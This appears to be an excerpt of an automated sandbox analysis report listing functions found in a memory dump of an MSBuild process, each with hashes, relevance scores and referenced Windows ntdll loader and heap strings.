                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                  • Opcode ID: c79c4a0e19c398a2dd19151c0115ad78b670fdb539fe3fcc8b2d7900e77cb3cf
                                                                                                                                                                                                                                                                  • Instruction ID: f4b507be6b82446214b55486aa57e6a5c0c1ab67df5ecd403c92f769f182c682
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c79c4a0e19c398a2dd19151c0115ad78b670fdb539fe3fcc8b2d7900e77cb3cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78E2B070A00219DFEF25CF68C590BA9BBF1FF49308F148199D949AB795D734A846CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                                                                                                  • Opcode ID: 6512744ff41b4139711f8f485792b94ef5ddbb4bca31ffc442acc2304b3faf1e
                                                                                                                                                                                                                                                                  • Instruction ID: aa606794cf20a0332903aee935a5d2cd2ebd11c63aedea79d222efa0a1890c13
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6512744ff41b4139711f8f485792b94ef5ddbb4bca31ffc442acc2304b3faf1e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1C18B74108386CFDB11EF58C044B6AB7E8FF84708F04486AF9959B791E738DA49CB62
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • @, xrefs: 013B8591
                                                                                                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013B855E
                                                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 013B8422
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 013B8421
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                                                                                                  • Opcode ID: 89b837b1eafe6fc3828244b47af9823a4fd8d4bdc730c7e8ea056d9260c0d017
                                                                                                                                                                                                                                                                  • Instruction ID: 4e7b305fc23423dd4d9061ad84196fd5ec46f01d0560f2a3b98ea64dd5460651
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89b837b1eafe6fc3828244b47af9823a4fd8d4bdc730c7e8ea056d9260c0d017
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9917C71508345AFDB21DF69CC80FABBAECFF84B48F40096EFA8496551E734D9448B62
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01390C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 013E54E0, 013E55A1
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 013E54D1, 013E5592
                                                                                                                                                                                                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 013E54ED
                                                                                                                                                                                                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 013E55AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                                                                                                                                  • API String ID: 0-1657114761
                                                                                                                                                                                                                                                                  • Opcode ID: f0e9825fe601d380b0c48df859ca5cac8dd07511b892f6b60d9750a5843e3d07
                                                                                                                                                                                                                                                                  • Instruction ID: 9c9ae90c0920a2f52412247ee98e105de782b766079d03fa2f8b135d59b29ff5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0e9825fe601d380b0c48df859ca5cac8dd07511b892f6b60d9750a5843e3d07
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A1F53060074ADFDF29DF28C480B7ABBF9AF55708F14856DE49A8B786D734A844CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014311A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-336120773
                                                                                                                                                                                                                                                                  • Opcode ID: 48583b6612e61fe12b5b63289edc979903f4c8a2aea21d5e8ada9cbecbcd7b55
                                                                                                                                                                                                                                                                  • Instruction ID: 45bf47bf52d2405674db58381d24479b489cb0d19591ba74cccffdb83f289ee4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48583b6612e61fe12b5b63289edc979903f4c8a2aea21d5e8ada9cbecbcd7b55
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF31E171200101EFD761DB9CC885FA7B7E8EF89E68F15005AF511EB3A1EA75AC44CB64
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 013EA998
                                                                                                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 013EA992
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 013EA9A2
                                                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 013A2462
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                                                                                                  • Opcode ID: 020544939df7848949185dda14d76cf3180dfeecaee32174070eba0dccae616d
                                                                                                                                                                                                                                                                  • Instruction ID: 71fbaa39fa363169ec009d64ba8b1ec4b0aa2ddc158860ab1b4d564b4ec0de59
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 020544939df7848949185dda14d76cf3180dfeecaee32174070eba0dccae616d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E312875600315ABEB319F6DD849EAAB7F9FB84B08F17405DF9017B2A5C7705841CB80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01379148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                                                                                                                                  • Opcode ID: 17c007d53b857c4064f6e3e111929351f99a31ba71a1435d1c8255891f2c78fb
                                                                                                                                                                                                                                                                  • Instruction ID: d66735a06e76d4a8ac329da13b90c8b2a46889ea392d5b6e8ab8212c30754cc3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17c007d53b857c4064f6e3e111929351f99a31ba71a1435d1c8255891f2c78fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2731E032600209EFDB21DB49DC85FAABBB8EF46A38F154159E914AB290D774E940CB61
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 01393264
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01393255
                                                                                                                                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0139327D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                                                                  • API String ID: 0-617086771
                                                                                                                                                                                                                                                                  • Opcode ID: 2e53364651ece32c831e86658a1a83aa3dbad8e4e02565f657d1507ba8cab540
                                                                                                                                                                                                                                                                  • Instruction ID: 00e5ac5a548c346feda2fc276f716e8bfcaccfeae4e8b7984511ce6190f96e13
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e53364651ece32c831e86658a1a83aa3dbad8e4e02565f657d1507ba8cab540
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A392BDB1A046499FEF25CF68C4807AEBBF1FF48318F148099E85AAB751D734A945CF50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01391F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                  • Opcode ID: b8bf6b3f4bccd4ecb5c7169f292de263a9504fefec97af5d9806fcc93e4c05b8
                                                                                                                                                                                                                                                                  • Instruction ID: 12c5dfb8a23efa11f31ee03e7afb080df3f60dc92320a5d3c7cc46cfcbb2ec9f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8bf6b3f4bccd4ecb5c7169f292de263a9504fefec97af5d9806fcc93e4c05b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4822FE70600756AFEB25CF28C459B7ABBF5EF4570CF188099E8598B392D735E881CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01390770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                                                                                                                                  • Opcode ID: c77076b0e9ef6fe7b2a9f396327b60a5e7f5a79fefeef3c7a1125b81848d8f39
                                                                                                                                                                                                                                                                  • Instruction ID: b53ce13ddecae1740540813d9897f1ea455fb46e2cb001059c23e9a29623cbd0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c77076b0e9ef6fe7b2a9f396327b60a5e7f5a79fefeef3c7a1125b81848d8f39
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F19B34A00606DFEF29CF68C884B6ABBF9FF45708F148169E5169B791D734E981CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01381460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 01381596
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01381712
                                                                                                                                                                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01381728
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                                                  • Opcode ID: cc5cb4317057ce05dfc29d21d564daedc017a9c7ca396dedb34a9b9fb2d60022
                                                                                                                                                                                                                                                                  • Instruction ID: cd70422cbaece6fb7ab3dd409ad1795b2034da12f7ede46249047cb79109e9ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc5cb4317057ce05dfc29d21d564daedc017a9c7ca396dedb34a9b9fb2d60022
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7E1F031A043459FDB29DF2CC490ABABBF9AF44318F18845DE9D6CB646D734E942CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: $@
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-1077428164
                                                                                                                                                                                                                                                                  • Opcode ID: 98a3b5abecd17afdbf2b672fe6d1a1b2ff13221f08873622756734dabc19937d
                                                                                                                                                                                                                                                                  • Instruction ID: cf92d765c298b0aabe964109d1fc0b6738961b3c96901df230a9c982ac921a17
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98a3b5abecd17afdbf2b672fe6d1a1b2ff13221f08873622756734dabc19937d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34C29D716083559FEB25CF28C881BABBBE5EF88718F44892DF989C7241D735D805CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                                                                                                  • Opcode ID: 2111b3732e8f51b5649a06db87a9571d6847113c58bf296dc863beda84b4e9e2
                                                                                                                                                                                                                                                                  • Instruction ID: 54656ae10512cc437d07f2e42af70d7b46510ff9ba39c02da51904b8e7d3c685
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2111b3732e8f51b5649a06db87a9571d6847113c58bf296dc863beda84b4e9e2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EA17D729116299BDF31DF68DC88BEAB7B8EF44718F1001E9E908A7250DB359E84CF50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0138B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                                                                  • API String ID: 0-373624363
                                                                                                                                                                                                                                                                  • Opcode ID: 805cedc7845cd5a5357200c9f2bab07164bfd3c755b4d791ed8525fb372f08d3
                                                                                                                                                                                                                                                                  • Instruction ID: 6812dba923b91356ff6f274063e4f21adee4cf80ca0b4504d271e90af04743d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 805cedc7845cd5a5357200c9f2bab07164bfd3c755b4d791ed8525fb372f08d3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E91CF71A0431ACFEB21DF58C454BAEBBB4FF0132CF144199E911AB2D5D7789A41CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: %$&$@
                                                                                                                                                                                                                                                                  • API String ID: 0-1537733988
                                                                                                                                                                                                                                                                  • Opcode ID: 0df07324aa8ad77a5f40fa53edfd846e346af70a20435b815160a59d96440bec
                                                                                                                                                                                                                                                                  • Instruction ID: b344ebe06589ea0fd10a5434e10b2f159f3d1013d10468efc8c584371702f1fd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df07324aa8ad77a5f40fa53edfd846e346af70a20435b815160a59d96440bec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7671B2B09093069FDB14DF18C5C0BABBBE9BF9461CF108A1DE79A4BA51E730D905CB52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013A15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 013EA590
                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 013EA59A
                                                                                                                                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 013EA589
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                                                  • API String ID: 0-1676968949
                                                                                                                                                                                                                                                                  • Opcode ID: bc9e7fdbad3b6aa91a184be5fbc2265f8bfda45b912376e7396ae9ca10311344
                                                                                                                                                                                                                                                                  • Instruction ID: d9dd263b2d3b47c640a42e43cccaeb416d741874ff5b0001b46f648a51ff602d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc9e7fdbad3b6aa91a184be5fbc2265f8bfda45b912376e7396ae9ca10311344
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951D170604745DBEB22DE6CC948B267BE8EB4077CF580569EE91DB6E2D774E800CB40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0142DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • HEAP: , xrefs: 0142DC1F
                                                                                                                                                                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0142DC32
                                                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 0142DC12
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                                                                                  • API String ID: 0-3815128232
                                                                                                                                                                                                                                                                  • Opcode ID: f9e0de7c63bbcd25d8e2b2db0690918a1e928cacb31c4b76159f0711e8a20529
                                                                                                                                                                                                                                                                  • Instruction ID: 69dd7898c8d10115a5b53e2031c9ecd46c63aec3734002d3aff5a076d9cad361
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9e0de7c63bbcd25d8e2b2db0690918a1e928cacb31c4b76159f0711e8a20529
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D5144359002308AE774CEAEC854773BBE2DF45684F84484BE4C2CB3A5D275D883DB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                                                                                                                                  • Opcode ID: c237d5c01b8de77c148f1abc9da0cdc9bd6d14c443e463d92e75eae82f8cf633
                                                                                                                                                                                                                                                                  • Instruction ID: 3f4164c593cbadff69f4d57daf2d7ab55e345f515838f736275742bbce05a65e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c237d5c01b8de77c148f1abc9da0cdc9bd6d14c443e463d92e75eae82f8cf633
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C04137B13002808FEF35CA2CC9C8BB97BE89F0135CF1844EDD5468B69AD678D889CB51
